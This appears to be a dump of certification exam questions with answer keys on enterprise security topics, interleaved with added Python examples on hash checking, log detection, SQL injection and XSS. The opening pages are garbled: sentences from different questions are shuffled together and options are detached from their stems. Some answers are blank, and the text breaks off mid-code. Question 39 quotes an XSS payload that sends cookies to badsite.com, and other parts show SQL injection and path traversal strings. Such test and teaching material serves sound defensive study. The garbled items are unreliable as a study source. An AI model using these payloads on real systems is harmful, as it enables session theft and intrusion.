Implement group policy objects Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 217 Company XYZ finds itself using more cloud-based business tools.C. Every user receives a popup warning about this policy upon login. B. Refer the issue to management for handling according to the incident response process. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: . password replication and shared accounts are not acceptable. Revise the corporate policy to include possible termination as a result of violations B. D. Which of the following implementations addresses the distributed login with centralized authentication and has wide compatibility among SaaS vendors? A. Disable the front-end web server and notify the customer by email to determine how the customer would like to proceed. yet violations continue to occur. Allow external connections to the existing corporate RADIUS server. The SIEM system produces a report of USB violations on a monthly basis. The CISO knows the acceptable use policy prohibits the use of USB storage devices. Security is important to the company. D. Increase the frequency and distribution of the USB violations report C. Install a read-only Active Directory server in the corporate DMZ for federation. Implement a new Diameter authentication server with read-only attestation. and password management is becoming onerous. Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 216 The Chief Information Security Officer (CISO) at a large organization has been reviewing some security-related incidents at the organization and comparing them to current industry trends. as a result. C. The desktop security engineer feels that the use of USB storage devices on office computers has contributed to the frequency of security incidents. Deploy PKI to add non-repudiation to login sessions so offenders cannot deny the offense D. 
Establish a cloud-based authentication service that supports SAML. Which of the following preventative controls would MOST effectively mitigate the logical risks associated with the use of USB storage devices? A.

The CIO has hired consultants to develop use cases to test against various government and industry security standards. A. Which of the following selections represent the BEST option for the CIO? A. LDAP D. the central authentication system must support hierarchical trust and the ability to natively authenticate mobile devices and workstations. Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 220 A security administrator was recently hired in a start-up company to represent the interest of security and to assist the network team in improving security in the company. Issue a policy specifying best practice security standards and a baseline to be implemented across the company. At the end of the project C. RADIUS E. D. The programmers are not on good terms with the security team and do not want to be distracted with security issues while they are working on a major project. In the middle of the project B. At the inception of the project . The CIO is convinced that there is large overlap between the configuration checks and security controls governing each set of standards. Shibboleth F. B.QUESTION 218 A network engineer wants to deploy user-based authentication across the company's wired and wireless infrastructure at layer 2 of the OSI model. Company policies require that users be centrally managed and authenticated and that each user's network access be controlled based on the user's role within the company. Which of the following are needed to implement these requirements? (Select TWO). Issue a policy that requires only the most stringent security standards be implemented throughout the company. SAML B. Which of the following is the BEST time to make them address security issues in the project? A. C. Issue a RFI for vendors to determine which set of security standards is best for the company. Issue a RFQ for vendors to quote a complete vulnerability and risk management solution to the company. 
PKI Correct Answer: CD Section: Mixed Questions Explanation Explanation/Reference: QUESTION 219 A company Chief Information Officer (CIO) is unsure which set of standards should govern the company's IT policy. WAYF C. Additionally.

D. At the time they request Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: .

The company should use a mixture of both systems to meet minimum standards. D. Force all SIP communication to be encrypted C. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic. Which of the following methodologies should be adopted? A. The company should use the CEO's encryption scheme. B. The company should use the method recommended by other respected information security organizations. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 3 A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. He has recommended that the company use his cryptographic method.Экзамен B QUESTION 1 An attacker attempts to create a DoS event against the VoIP system of a company. the Chief Executive Officer (CEO). He has designed a network defense method which he says is significantly better than prominent international standards. D. The company should develop an in-house solution and keep the algorithm a secret. Survey threat feeds from services inside the same industry. B. was an Information security professor and a Subject Matter Expert for over 20 years. The attacker uses a tool to flood the network with a large number of SIP INVITE traffic. Deploy a UTM solution that receives frequent updates from a trusted industry vendor. Conduct an internal audit against industry best practices to perform a qualitative analysis. C. Create separate VLANs for voice and data traffic D. Implement QoS parameters on the switches Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 2 Joe. Correct Answer: A Section: (none) . Which of the following would be LEAST likely to thwart such an attack? A. C. Which of the following should the CSO conduct FIRST? A. Install IDS/IPS systems on the network B.

IPtables firewall D. Which of the following tools can BEST meet the CISO's requirement? A. GRC . HIPS Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 5 A large enterprise acquires another company which uses antivirus from a different vendor. Which of the following would BEST accomplish this? A. SELinux C. Access control lists B.Explanation Explanation/Reference: QUESTION 4 An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. The CISO has requested that data feeds from the two different antivirus platforms be combined in a way that allows management to assess and rate the overall effectiveness of antivirus across the entire organization.

When speaking with the network administrator. Syslog-ng E. C. the security administrator learns that the existing routers have the minimum processing power to do the required level of encryption. Parse all images to determine if extra data is hidden using steganography. Correct Answer: AC Section: (none) Explanation Explanation/Reference: . Install an SSL acceleration appliance C. A technician notices that the date/time stamp of the image source appears to have changed. Add an encryption module to the router and configure IPSec Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 7 The source workstation image for new accounting PCs has begun blue-screening. Which of the following methods would BEST help with this process? (Select TWO). B. A. ABC Company must now encrypt all WAN transmissions. IPS C. E. Ask desktop support if any changes to the images were made. D. Retrieve source system image from backup and run file comparison analysis on the two images. Require all core business applications to use encryption D. Deploy inline network encryption devices B. The desktop support director has asked the Information Security department to determine if any changes were made to the source image. Calculate a new hash and compare it with the previously captured image hash. CMDB D. Which of the following solutions minimizes the performance impact on the router? A.B. IDS Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 6 Due to a new regulatory requirement. Check key system files to see if date/time stamp is in the past six months.
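The hash comparison of option C and the file-by-file comparison of option E in Question 7, as an added example that is not part of the exam dump: it streams SHA-256 over a file, diffs a golden image tree against the current copy, and shows why a timestamp check on its own is weak, since a change whose access/modification times were put back looks untouched to a date check but not to the hash. The directory layout, file names and contents are constructed for the demonstration.

```python
"""Added example, not part of the exam dump: verify the accounting workstation
image by hash instead of by timestamp, and diff a golden copy against the
current copy file by file. All files and names below are constructed."""
import hashlib
import hmac
import os
import tempfile
from pathlib import Path

CHUNK_SIZE = 1 << 20  # stream in 1 MiB pieces so a multi-GB image never sits in RAM


def sha256_file(path):
    """SHA-256 of one file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK_SIZE), b""):
            digest.update(chunk)
    return digest.hexdigest()


def image_matches(path, recorded_digest):
    """Option C: recompute the hash and compare it with the digest captured at build time."""
    return hmac.compare_digest(sha256_file(path), recorded_digest)


def tree_hashes(root):
    """Relative path -> SHA-256 for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare_trees(baseline, current):
    """Option E: return (modified, added, removed) paths between two hash maps."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return modified, added, removed


def build_scenario(tmp):
    """Constructed: a golden image tree and a tampered copy with its timestamps put back."""
    golden, current = Path(tmp, "golden"), Path(tmp, "current")
    files = {"system/kernel.bin": b"K" * 4096, "system/hosts": b"127.0.0.1 localhost\n"}
    for root in (golden, current):
        for rel, data in files.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(data)
    # Tamper with the copy: rewrite hosts, drop a new binary, then restore the
    # original access/modification times so a date check (option A) sees nothing.
    (current / "system/hosts").write_bytes(b"127.0.0.1 update.example.test\n")
    (current / "system/dropper.bin").write_bytes(b"MZ" + b"\x90" * 64)
    for rel in files:
        st = (golden / rel).stat()
        os.utime(current / rel, ns=(st.st_atime_ns, st.st_mtime_ns))
    return golden, current


def audit():
    """Run the timestamp check and the hash checks over the constructed scenario."""
    with tempfile.TemporaryDirectory() as tmp:
        golden, current = build_scenario(tmp)
        baseline = tree_hashes(golden)
        mtime_changed = any(
            (current / rel).stat().st_mtime_ns != (golden / rel).stat().st_mtime_ns
            for rel in baseline
        )
        modified, added, removed = compare_trees(baseline, tree_hashes(current))
        return {
            "mtime_changed": mtime_changed,  # False: the timestamps were reset
            "kernel_matches_recorded_hash": image_matches(
                current / "system/kernel.bin", baseline["system/kernel.bin"]),
            "modified": modified,
            "added": added,
            "removed": removed,
        }


if __name__ == "__main__":
    for key, value in audit().items():
        print(f"{key}: {value}")
```

In practice the baseline hashes come from the image build pipeline and are stored where the imaging host cannot rewrite them; `hmac.compare_digest` is used for the comparison so that verification scripts do not leak timing information about the recorded digest.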

QUESTION 8
The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. The legacy system is out of support because the vendor and security patches are no longer released. Additionally, this is a proprietary embedded system and little is documented and known about it. Which of the following should the Information Technology department implement to reduce the security risk from a compromise of this system?

A. Virtualize the system and migrate it to a cloud provider.
B. Segment the device on its own secure network.
C. Install an antivirus and HIDS on the system.
D. Hire developers to reduce vulnerabilities in the code.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 9
An organization has decided to reduce labor costs by outsourcing back office processing of credit applications to a provider located in another country. Data sovereignty and privacy concerns raised by the security team resulted in the third-party provider only accessing and processing the data via remote desktop sessions. To facilitate communications and improve productivity, staff at the third party has been provided with corporate email accounts that are only accessible via the remote desktop sessions. Email forwarding is blocked and staff at the third party can only communicate with staff within the organization. Which of the following additional controls should be implemented to prevent data loss? (Select THREE).

A. Implement hashing of data in transit
B. Session recording and capture
C. Disable cross session cut and paste
D. Monitor approved credit accounts
E. User access audit reviews
F. Source IP whitelisting

Correct Answer: CEF
Section: (none)
Explanation

Explanation/Reference:

QUESTION 10
The technology steering committee is struggling with increased requirements stemming from an increase in telecommuting. The organization has not addressed telecommuting in the past. The implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from remote locations with corporate assets. Which of the following steps must the committee take FIRST to outline senior management's directives?

A. Develop an information classification scheme that will properly secure data on corporate systems.
B. Implement database views and constrained interfaces so remote users will be unable to access PII from personal equipment.
C. Publish a policy that addresses the security requirements for working remotely with company equipment.
D. Work with mid-level managers to identify and document the proper procedures for telecommuting.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 11
A security engineer is responsible for monitoring company applications for known vulnerabilities. Which of the following is a way to stay current on exploits and information security news?

A. Update company policies and procedures
B. Subscribe to security mailing lists
C. Implement security awareness training
D. Ensure that the organization vulnerability management plan is up-to-date

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 12
A security manager for a service provider has approved two vendors for connections to the service provider backbone. One vendor will be providing authentication services for its payment card service, and the other vendor will be providing maintenance to the service provider infrastructure sites. Which of the following business agreements is MOST relevant to the vendors and service provider's relationship?

A. Memorandum of Agreement
B. Interconnection Security Agreement
C. Non-Disclosure Agreement
D. Operating Level Agreement

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 13
A security officer is leading a lessons learned meeting. Which of the following should be components of that meeting? (Select TWO).

A. Demonstration of IPS system
B. Review vendor selection process
C. Calculate the ALE for the event
D. Discussion of event timeline
E. Assigning of follow up items

Correct Answer: DE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 14
The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. The DMZ design must support security in depth, change management and configuration processes, and support incident reconstruction. Which of the following designs BEST supports the given requirements?

A. A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator.
B. A single firewall DMZ where each firewall interface is managed by a separate administrator and logging to the cloud.
C. A SaaS based firewall which logs to the company's local storage via SSL, and is managed by the change control team.
D. A virtualized firewall, where each virtual instance is managed by a separate administrator and logging to the same hardware.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 15
Which of the following provides the BEST risk calculation methodology?

A. Annual Loss Expectancy (ALE) x Value of Asset
B. Potential Loss x Event Probability x Control Failure Probability
C. Impact x Threat x Vulnerability
D. Risk Likelihood x Annual Loss Expectancy (ALE)

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 16
Ann, a systems engineer, is working to identify an unknown node on the corporate network. To begin her investigative work, she runs the following nmap command string:

user@hostname:~$ sudo nmap -O 192.168.1.54

Based on the output, nmap is unable to identify the OS running on the node, but the following ports are open on the device:

TCP/22
TCP/111
TCP/512-514
TCP/2049
TCP/32778

Based on this information, which of the following operating systems is MOST likely running on the unknown node?

A. Linux
B. Windows
C. Solaris
D. OSX

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 17
A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important?

A. Insecure direct object references, CSRF, Smurf
B. Privilege escalation, Application DoS, Buffer overflow
C. SQL injection, Resource exhaustion, Privilege escalation
D. CSRF, Fault injection, Memory leaks

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 18
A company sales manager received a memo from the company's financial department which stated that the company would not be putting its software products through the same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year. The memo also stated that the marketing material and service level agreement for each product would remain unchanged. The sales manager has reviewed the sales goals for the upcoming year and identified an increased target across the software products that will be affected by the financial department's change. All software products will continue to go through new development in the coming year. Which of the following should the sales manager do to ensure the company stays out of trouble?

A. Discuss the issue with the software product's user groups
B. Consult the company's legal department on practices and law
C. Contact senior finance management and provide background information
D. Seek industry outreach for software practices and law

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 19
The security administrator finds unauthorized tables and records, which were not present before, on a Linux database server. The database server communicates only with one web server, which connects to the database server via an account with SELECT only privileges. Web server logs show the following:

90.76.165.40 - - [08/Mar/2014:10:54:04] "GET calendar.php?create%20table%20hidden HTTP/1.1" 200 5724
90.76.165.40 - - [08/Mar/2014:10:54:05] "GET ../../../root/.bash_history HTTP/1.1" 200 5724
90.76.165.40 - - [08/Mar/2014:10:54:04] "GET index.php?user<script>Create</script> HTTP/1.1" 200 5724

The security administrator also inspects the following file system locations on the database server using the command `ls -al /root':

drwxrwxrwx 11 root root 4096 Sep 28 22:45 .
drwxr-xr-x 25 root root 4096 Mar 8 09:30 ..
-rws------ 25 root root 4096 Mar 8 09:30 .bash_history
-rw------- 25 root root 4096 Mar 8 09:30 .bash_history
-rw------- 25 root root 4096 Mar 8 09:30 .profile
-rw------- 25 root root 4096 Mar 8 09:30 .ssh

Which of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future? (Select TWO).

A. Privilege escalation
B. Brute force attack
C. SQL injection
D. Cross-site scripting
E. Using input validation, ensure the following characters are sanitized: <>
F. Update crontab with: find / \( -perm -4000 \) -type f -print0 | xargs -0 ls -l | email.sh
G. Implement the following PHP directive: $clean_user_input = addslashes($user_input)
H. Set an account lockout policy

Correct Answer: AF
Section: (none)
Explanation

Explanation/Reference:
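Detection logic for the request patterns in the Question 19 log, as an added example that is not taken from the exam dump. The log lines are a constructed copy of the three requests above plus one benign request; each request target is URL-decoded and matched against rules for DDL in a query string, stacked statements, directory traversal and script tags. find_suid() is a Python equivalent of the `find / -perm -4000 -type f` check in option F, run over a constructed temporary tree in which one file is given the set-uid bit like the `-rws------` entry in the listing.

```python
"""Added example, not part of the exam dump: classify the request patterns
seen in the Question 19 web server log, and list set-uid files the way the
crontab entry in option F does. The log lines are constructed from the three
requests in the question plus one benign request; the file tree is constructed."""
import os
import re
import stat
import tempfile
from pathlib import Path
from urllib.parse import unquote

SAMPLE_LOG = """\
90.76.165.40 - - [08/Mar/2014:10:54:04] "GET calendar.php?create%20table%20hidden HTTP/1.1" 200 5724
90.76.165.40 - - [08/Mar/2014:10:54:05] "GET ../../../root/.bash_history HTTP/1.1" 200 5724
90.76.165.40 - - [08/Mar/2014:10:54:04] "GET index.php?user<script>Create</script> HTTP/1.1" 200 5724
10.0.0.7 - - [08/Mar/2014:10:55:00] "GET index.php?user=alice HTTP/1.1" 200 812
"""

# Apache/nginx-style access line: client, identd, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Each rule is applied to the URL-decoded request target.
RULES = [
    ("sql_ddl", re.compile(r"\b(create|alter|drop)\s+table\b", re.I)),
    ("sql_stacked", re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I)),
    ("path_traversal", re.compile(r"(^|[/\\])\.\.([/\\]|$)")),
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
]


def parse_line(line):
    """Return the fields of one access-log line, with the target URL-decoded, or None."""
    match = LOG_RE.match(line)
    if not match:
        return None
    record = match.groupdict()
    record["decoded"] = unquote(record["target"])  # %20 -> ' ' before matching
    return record


def scan_log(text):
    """Return (client_ip, decoded_target, [rule names]) for every line that trips a rule."""
    findings = []
    for line in text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        hits = [name for name, pattern in RULES if pattern.search(record["decoded"])]
        if hits:
            findings.append((record["ip"], record["decoded"], hits))
    return findings


def find_suid(root):
    """Python equivalent of `find ROOT -perm -4000 -type f`: regular files with the set-uid bit."""
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(os.path.relpath(path, root))
    return sorted(found)


def suid_demo():
    """Constructed tree: one file is given mode 4700, like the `-rws------` entry in the listing."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp, "root")
        home.mkdir()
        (home / ".bash_history").write_bytes(b"#!/bin/sh\n")
        (home / ".profile").write_bytes(b"")
        os.chmod(home / ".bash_history", 0o4700)
        return find_suid(tmp)


if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {hits} {target}")
    print("set-uid files:", suid_demo())
```

The decode step matters: `create%20table%20hidden` does not contain the string `create table` until it is unquoted, so a rule run over the raw target misses it. For the scheduled check in option F, the useful output is the difference between runs, so a production job would store the previous list and alert only on new set-uid files rather than mailing the whole list every time.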

B. and the subsidiaries becoming an SP. They are currently installing fiber-to-the-home in many areas with hopes of also providing telephone and Internet services. Create a proposal and present it to management for approval. D. Construct a series of VMs to host the malware environment. The companies should federate. and customer authentication. with the parent becoming the SP. However all three companies must share customer data for the purposes of accounting. B. and the subsidiaries becoming an IdP. and be simple and seamless for customers. and the subsidiaries becoming an SSP. with the parent becoming the ASP. The board of directors wishes to keep the subsidiaries separate from the parent company. The companies should federate. The companies should federate. Which of the following solutions is BEST suited for this scenario? A. billing. The telephone and Internet services portions of the company will each be separate subsidiaries of the parent company. C. The companies should federate. Correct Answer: C Section: (none) Explanation Explanation/Reference: . The solution must use open standards. C. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 21 Company XYZ provides cable television service to several regional areas. with the parent becoming the IdP. D. and the subsidiaries becoming an IdP. Develop a policy to outline what will be required in the secure lab. Purchase new hardware to keep the malware isolated. Which of the following is the NEXT step that the security team should take? A. while only sharing minimal data between the companies. with the parent becoming the IdP.QUESTION 20 A member of the software development team has requested advice from the security team to implement a new secure lab for testing malware.

Mitigate D. C.QUESTION 22 The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage. likelihood of exploitability. Transfer Correct Answer: Section: (none) Explanation Explanation/Reference: QUESTION 23 A completely new class of web-based vulnerabilities has been discovered. Attempt to exploit via the proof-of-concept code. Which of the following risk strategies did the CISO implement? A. In response. Proof-of. B. Which of the following BEST describes how the security advisor should respond? A.concept details have emerged on the Internet. Advise management of any `high' or `critical' penetration test findings and put forward recommendations for mitigation. Notify all customers about the threat to their hosted data. Hire an independent security consulting agency to perform a penetration test of the web servers. Correct Answer: A Section: (none) Explanation Explanation/Reference: . and realizes this is a risk to the company. Bring the web servers down into "maintenance mode" until the vulnerability can be reliably mitigated through a vendor patch. and impact to hosted data. the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. A security advisor within a company has been asked to provide recommendations on how to respond quickly to these vulnerabilities. Avoid B. Assess the reliability of the information source. Claims have been made that all common web-based development frameworks are susceptible to attack. Respond to management with a recommendation to wait until the news has been independently verified by software vendors providing the web application software. Consider remediation options. Accept C. Review vulnerability write-ups posted on the Internet. D.

Establish deduplication across diverse storage paths. separation of duties D. D. The current storage method is a single NAS used by all servers in both datacenters. running as local admin. with split staff/guest wireless functionality. as well as deployment of VDI for all client computing needs. collusion Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 25 The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. an administrative control B. Replicate NAS changes to the tape backups at the other datacenter. C. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 26 An organization is concerned with potential data loss in the event of a disaster. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. and created a backup datacenter as a mitigation strategy. Ensure each server has two HBAs connected through two routes to the NAS. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed. B. with push technology for definition updates. Which of the following equipment MUST be deployed to guard against unknown threats? A. with direct control of the perimeter firewall ACLs. The network is mostly flat.QUESTION 24 A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate without external interaction from another user with elevated privileges. B. least privilege E. segregated on a management VLAN. Which of the following options increases data availability in the event of a datacenter failure? A. This requirement is BEST described as an implementation of: A. Host based heuristic IPS. Implementation of an offsite data center hosting all company data. Cloud-based antivirus solution. . C. dual control C.

Split-tunnel VPN should be enforced when transferring sensitive data. Full-drive file hashing should be implemented with hashes stored on separate storage. NTLM C. Full-tunnel VPN should be required for all network communication. The company is using Active Directory Federated Services for their directory service. Correct Answer: BD Section: (none) Explanation Explanation/Reference: QUESTION 28 An organization would like to allow employees to use their network username and password to access a third-party service. D. Kerberos . OAUTH D. E. SAML C. C. B. A. Which of the following should the company ensure is supported by the third-party? (Select TWO). LDAP/S B. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO). Strong authentication should be implemented via external biometric devices. F. A full-system backup should be implemented to a third-party provider with strong encryption for data in transit. A DLP gateway should be installed at the company border. A.Correct Answer: Section: (none) Explanation Explanation/Reference: QUESTION 27 A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 29
A mature organization with legacy information systems has incorporated numerous new processes and dependencies to manage security as its networks and infrastructure are modernized. The Chief Information Officer has become increasingly frustrated with frequent releases, stating that the organization needs everything to work completely, and the vendor should already have those desires built into the software product. The vendor has been in constant communication with personnel and groups within the organization to understand its business process and capture new software requirements from users. Which of the following methods of software development is this organization's configuration management process using?

A. Agile
B. SDL
C. Waterfall
D. Joint application development

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 30
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim's privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?

A. Integer overflow
B. Click-jacking
C. Race condition
D. SQL injection
E. Use after free

F. Input validation

Correct Answer: E
Section: (none)
Explanation

Explanation/Reference:
Accessing heap memory after it has been freed is a use-after-free condition, which is what the described crash followed by code execution at the victim's privilege level indicates.

QUESTION 31
A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. While the business is lucrative, they do not have the resources or the scalability to adequately serve their clients. Since it is an e-discovery firm where chain of custody is important, which of the following scenarios should they consider?

A. Offload some data processing to a public cloud
B. Aligning their client intake with the resources available
C. Using a community cloud with adequate controls
D. Outsourcing the service to a third party cloud provider

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 32
select id, firstname, lastname from authors
User input= firstname= Hack;man lastname=Johnson
Which of the following types of attacks is the user attempting?

A. XML injection
B. Command injection
C. Cross-site scripting
D. SQL injection

Correct Answer: D
Section: (none)
Explanation
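Added example, not part of the exam dump: a runnable Python demonstration of why string-built queries like the one in Question 32 are injectable and how bound parameters close the hole. The authors table and its three rows are constructed here, and the WHERE clause is an assumption about how the page's SELECT statement is completed, since the question shows only the select list.

```python
import sqlite3

# Constructed sample data: the "authors" table and its columns follow the query in the question.
SAMPLE_AUTHORS = [
    (1, "Hack", "Johnson"),
    (2, "Ann", "Smith"),
    (3, "Joe", "Doe"),
]


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE authors (id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT)")
    conn.executemany("INSERT INTO authors VALUES (?, ?, ?)", SAMPLE_AUTHORS)
    return conn


def lookup_vulnerable(conn, firstname, lastname):
    """Builds the WHERE clause by string concatenation: user input becomes SQL grammar."""
    sql = (
        "select id, firstname, lastname from authors "
        f"where firstname='{firstname}' and lastname='{lastname}'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, firstname, lastname):
    """Same query with bound parameters: values travel out of band and can only ever be data."""
    sql = "select id, firstname, lastname from authors where firstname=? and lastname=?"
    return conn.execute(sql, (firstname, lastname)).fetchall()


def compare(firstname, lastname):
    """Run both lookups on a fresh database and return (vulnerable_rows, parameterized_rows)."""
    conn = make_db()
    try:
        return (
            lookup_vulnerable(conn, firstname, lastname),
            lookup_parameterized(conn, firstname, lastname),
        )
    finally:
        conn.close()


if __name__ == "__main__":
    # Tautology: every row comes back although no author has these names.
    print(compare("x' or '1'='1", "x' or '1'='1"))
    # Comment truncation: the lastname test is commented out, so a wrong lastname still matches.
    print(compare("Hack'--", "wrong"))
```

The parameterized lookup returns nothing for both malicious inputs because the quote and the comment marker are looked up literally as part of a name; only the concatenated version lets them rewrite the statement.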

Explanation/Reference:

QUESTION 33
A network administrator with a company's NSP has received a CERT alert for targeted adversarial behavior at the company. In addition to the company's physical security, which of the following can the network administrator use to detect the presence of a malicious actor physically accessing the company's network or information systems from within? (Select TWO).

A. RAS
B. Vulnerability scanner
C. HTTP intercept
D. HIDS
E. Port scanner
F. Protocol analyzer

Correct Answer: DF
Section: (none)
Explanation

Explanation/Reference:

QUESTION 34
A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now?

A. Agile
B. Waterfall
C. Scrum
D. Spiral

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 35
Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform?

A. Aggressive patch management on the host and guest OSs.
B. Host based IDS sensors on all guest OSs.
C. Different antivirus solutions between the host and guest OSs.
D. Unique Network Interface Card (NIC) assignment per guest OS.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 36
The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer's (CSO) request to harden the corporate network's perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary?

A. The corporate network is the only network that is audited by regulators and customers.
B. The aggregation of employees on a corporate network makes it a more valuable target for attackers.
C. Home networks are unknown to attackers and less likely to be targeted directly.
D. Employees are more likely to be using personal computers for general web browsing when they are at home.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 37
An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource Management (CRM) application. Which of the following ensures the organization mitigates the risk of managing separate user credentials?

A. Ensure the SaaS provider supports dual factor authentication.
B. Ensure the SaaS provider supports encrypted password transmission and storage.
C. Ensure the SaaS provider supports secure hash file exchange.

D. Ensure the SaaS provider supports role-based access control.
E. Ensure the SaaS provider supports directory services federation.

Correct Answer: E
Section: (none)
Explanation

Explanation/Reference:

QUESTION 38
A security manager has received the following email from the Chief Financial Officer (CFO): "While I am concerned about the security of the proprietary financial data in our ERP application, we have had a lot of turnover in the accounting group and I am having a difficult time meeting our monthly performance targets. As things currently stand, we do not allow employees to work from home but this is something I am willing to allow so we can get back on track. What should we do first to securely enable this capability for my group?" Based on the information provided, which of the following would be the MOST appropriate response to the CFO?

A. Remote access to the ERP tool introduces additional security vulnerabilities and should not be allowed.
B. Allow VNC access to corporate desktops from personal computers for the users working from home.
C. Allow terminal services access from personal computers after the CFO provides a list of the users working from home.
D. Work with the executive management team to revise policies before allowing any remote access.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 39
A security administrator notices the following line in a server's security log:

<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';

The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
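Added example, not part of the exam dump: a Python reconstruction of the attribute breakout in the Question 39 log line, the output-encoding fix the developer eventually ships, and the kind of interim request-inspection rule a WAF would apply while that fix is pending. The payload string is taken from the log line above; the rendering functions and the WAF pattern are assumptions for illustration, not the application's or any product's code.

```python
import html
import re

# The parameter value as it appears in the log line of the question.
PAYLOAD = "'><script>document.location='http://badsite.com/?q='document.cookie</script>"


def render_vulnerable(credentials):
    """The page as the log suggests it is built: the raw parameter is spliced into a single-quoted attribute."""
    return "<input name='credentials' type='TEXT' value='" + credentials + "'>"


def render_encoded(credentials):
    """The developer's fix: attribute-encode the value so quotes and angle brackets stay literal text."""
    return "<input name='credentials' type='TEXT' value='" + html.escape(credentials, quote=True) + "'>"


def attribute_breakout(markup):
    """True if the value closed the quoted attribute and started a new <script> tag."""
    return "<script" in markup.lower()


# Interim control: a minimal WAF-style signature applied to request parameters before they reach
# the unfixed application. Hypothetical rule, broad on purpose; tune it against real traffic.
XSS_RULE = re.compile(
    r"<\s*/?\s*script|javascript:|document\.(cookie|location)|\bon\w+\s*=",
    re.IGNORECASE,
)


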